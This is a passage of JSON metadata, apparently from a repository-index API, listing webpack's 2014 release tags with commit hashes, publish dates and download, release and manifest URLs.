.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste